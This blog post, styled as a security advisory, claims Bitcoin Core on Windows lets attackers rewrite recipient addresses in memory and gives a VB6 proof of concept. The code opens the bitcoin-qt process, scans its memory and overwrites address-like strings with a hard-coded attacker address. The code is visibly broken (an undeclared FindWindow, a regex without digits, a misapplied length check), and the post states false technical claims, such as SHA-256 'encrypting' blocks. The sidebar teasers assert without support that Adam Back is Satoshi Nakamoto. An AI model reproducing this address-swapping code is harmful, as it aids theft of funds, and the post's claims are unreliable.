The Bitcoin app is vulnerable to hackers!

 

The Bitcoin app is vulnerable to hackers!

Description

Bitcoin Core Latest version 22.0 suffers from a memory management issue that enables attackers to redirect funds to their own Bitcoin address.

DATE(S) ISSUED: 06/22/2023

RISK: Critical

Businesses:

Large and medium Bitcoin miners HIGH

Home Users: LOW

Method: Remote thread execution

 

OVERVIEW:

The Bitcoin app on Windows is currently facing issues related to memory management and memory protection. These vulnerabilities allow attackers to modify the stored sending address within the app's memory, ultimately leading to the redirection of Bitcoin transactions to their own wallets.

 

Attackers Method:

The Bitcoin app is suffering from memory management issues, allowing attackers to open bitcoin’s process and search for Bitcoin wallet addresses stored in the memory. While Bitcoin uses the SHA-256 hashing algorithm to encrypt the data stored in the blocks on the blockchain, the BTC addresses themselves are not encrypted in the memory.

When a transaction occurs on the Bitcoin blockchain, it takes place through the utilization of public addresses. These public addresses are stored within the Bitcoin app prior to initiating the process.

An attacker can simply search for these BTC addresses, which consist of a string of 26-35 letters and numbers, enabling them to easily locate all the Bitcoin wallets stored in the Bitcoin app and replace them with their own.

When an attacker replaces the public address, it can result in a straightforward redirection of Bitcoin transactions to their own wallets. Due to the inherent nature of Bitcoin, this process is Irreversible.

This method closely resembles the widely-known point-of-sale malware called Tinypos.

My research about Tinypos can be found here:

https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/

To my understanding, we can expect to see an increase in the prevalence of Bitcoin point-of-sale (POS) malware in the near future!

The major difference between Tinypos and Bitcoin malware is that Bitcoin operates in a decentralized manner without a central authority. Therefore, if you become a victim of an attack, your funds will be permanently lost!

 

Video of Attack:

https://www.youtube.com/watch?v=oEl4M1oZim0

In this video, I used an app called Cheat Engine to demonstrate how hacking a Bitcoin wallet works. As you can see in the video, I created a Bitcoin sending address under my name. An attacker can easily gain access to the Bitcoin memory app and replace it with another BTC wallet, causing all funds to be transferred to their own wallet during any transaction!


POC:

 

replace_hash = "bc1pkwjlvljdq6huzk85d8z695v26e93dd1m0upqumkncmx640dpdu4suyukmt"   ' attacker's hash


Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long

Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function VirtualQueryEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, lpBuffer As MEMORY_BASIC_INFORMATION, ByVal dwLength As Long) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long


Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Const WM_GETTEXT As Long = &HD

Private Const WM_SETTEXT As Long = &HC

Private Const MEM_COMMIT As Long = &H1000

Private Const MEM_PRIVATE As Long = &H20000

Private Const PAGE_READWRITE As Long = &H4


Private Type MEMORY_BASIC_INFORMATION

    BaseAddress As Long

    AllocationBase As Long

    AllocationProtect As Long

    RegionSize As Long

    State As Long

    Protect As Long

    Type As Long

End Type


Private Sub Bitcoin_hack ()

    Dim hWnd As Long

    Dim processId As Long

    Dim hProcess As Long

    Dim buffer As String

    Dim processName As String

    Dim searchString As String

    Dim replacementString As String

    

    processName = "bitcoin-qt.exe" 

    searchString = "^[A-Za-z]{26,35}$" ' Pattern for strings with 26-35 letters Bitcoin address


    replacementString = replace_hash 

    

    hWnd = FindWindow(vbNullString, processName)

    

    If hWnd <> 0 Then

        ' Get the process ID

        GetWindowThreadProcessId hWnd, processId

        

        ' Open the process

        hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, processId)

        

        If hProcess <> 0 Then

            Dim lpMemInfo As MEMORY_BASIC_INFORMATION

            Dim lpBuffer As String

            Dim lpAddress As Long

            Dim bytesRead As Long

            

            lpAddress = 0 ' Start at the beginning of the process memory

            

            Do While VirtualQueryEx(hProcess, lpAddress, lpMemInfo, Len(lpMemInfo)) <> 0

                If (lpMemInfo.State = MEM_COMMIT) And (lpMemInfo.Type = MEM_PRIVATE) And (lpMemInfo.Protect = PAGE_READWRITE) Then

                    ' Allocate a buffer to read the memory

                    lpBuffer = Space(lpMemInfo.RegionSize)

                    

                    ' Read the memory

                    ReadProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal lpBuffer, lpMemInfo.RegionSize, bytesRead

                    

                    ' Check if the buffer contains a matching string

                    If Len(lpBuffer) >= 26 And Len(lpBuffer) <= 35 And RegExpMatch(lpBuffer, searchString) Then

                        Dim writeBuffer As String

                        writeBuffer = RegExpReplace(lpBuffer, searchString, replacementString)

                        

                        ' Write the modified text

                        WriteProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal StrPtr(writeBuffer), Len(writeBuffer), 0

                    End If

                End If

                

                ' Move to the next memory region

                lpAddress = lpMemInfo.BaseAddress + lpMemInfo.RegionSize

            Loop

            

            ' Close the process handle

            CloseHandle hProcess

        Else

            MsgBox "Failed to open the process.", vbCritical

        End If

    Else

        MsgBox "The process could not be found.", vbCritical

    End If

End Sub


Private Function RegExpMatch(ByVal text As String, ByVal pattern As String) As Boolean

    Dim regExp As Object

    Set regExp = CreateObject("VBScript.RegExp")

    

    With regExp

        .Global = True

        .IgnoreCase = True

        .Pattern = pattern

    End With

    

    RegExpMatch = regExp.Test(text)

End Function


Private Function RegExpReplace(ByVal text As String, ByVal pattern As String, ByVal replacement As String) As String

    Dim regExp As Object

    Set regExp = CreateObject("VBScript.RegExp")

    

    With regExp

        .Global = True

        .IgnoreCase = True

        .Pattern = pattern

    End With

    

    RegExpReplace = regExp.Replace(text, replacement)

End Function

 

Summary:

Use Cold Wallets until they fix this!


Questions ?

Nima_bagheri79@yahoo.com





 

Comments

Post a Comment

Popular posts from this blog

Meet the Founder of Bitcoin Adam Back aka Satoshi Nakamoto!

Image
  Hi Guys This is Nima Bagheri Cyber security Expert and This is How i find Satoshi Nakamoto i was suspicious about Satoshi Nakamoto when i have seen this post on bitcointalk.org This user was asking about the latest satoshi build and if you check bitcoin.org you can only see the bitcoin 0.3.2. 1 and version 0.3.2.0   is missing so i thought why not to take a look!  I was able to download bitcoin 0.3.2.0    via virustotal because this file has been remove from everywhere. Here is the link for you. Bitcoin 0.3.19 is the latest build that was developed by Satoshi Nakamoto. Bitcoin 0.3.20 is the first Bitcoin developed by Gavin Andresen. ( Gavin Andresen - Wikipedia  )   https://www.virustotal.com/gui/file/31bfa7f8cca72a51b853c79b4f55ac134f2b59a211605005ee10592d3673be73/details   When you compile a source code file to an exe file your computer generates a unique footprint of your computer into the executable files which are so different for each pc. For example, if
Read more

Why Adam Back not confirming he is the Founder of Bitcoin ? ( Part 2 )

Image
Why Dr Back is not confirming that he is Satoshi Nakamoto ? Check my video here: https://www.youtube.com/watch?v=AHnfS0k2614 I would like to let Adam Back speak about himself. Let's check his Wikipedia https://en.wikipedia.org/w/index.php?title=Adam_Back&oldid=120281396 https://en.wikipedia.org/w/index.php?title=Adam_Back&oldid=120273718 In 2007 when no one knew about Crypto Adam described himself as a Crypto Anarchist Leanings and Capitalist. And then within a few hours, Adam changed his bio to  Crypto Anarchist and Capitalist Leanings. Here is the interesting part, 4 weeks after Satoshi has been disappeared from the public this information about Adam back has been removed  from Adam's Wikipedia. https://en.wikipedia.org/w/index.php?title=Adam_Back&dir=prev&action=history https://en.wikipedia.org/w/index.php?title=Adam_Back&oldid=436626208 Guess what, who did that? another Ph.D. software engineer called David Eppstein from UK trying to do a favor to his bes
Read more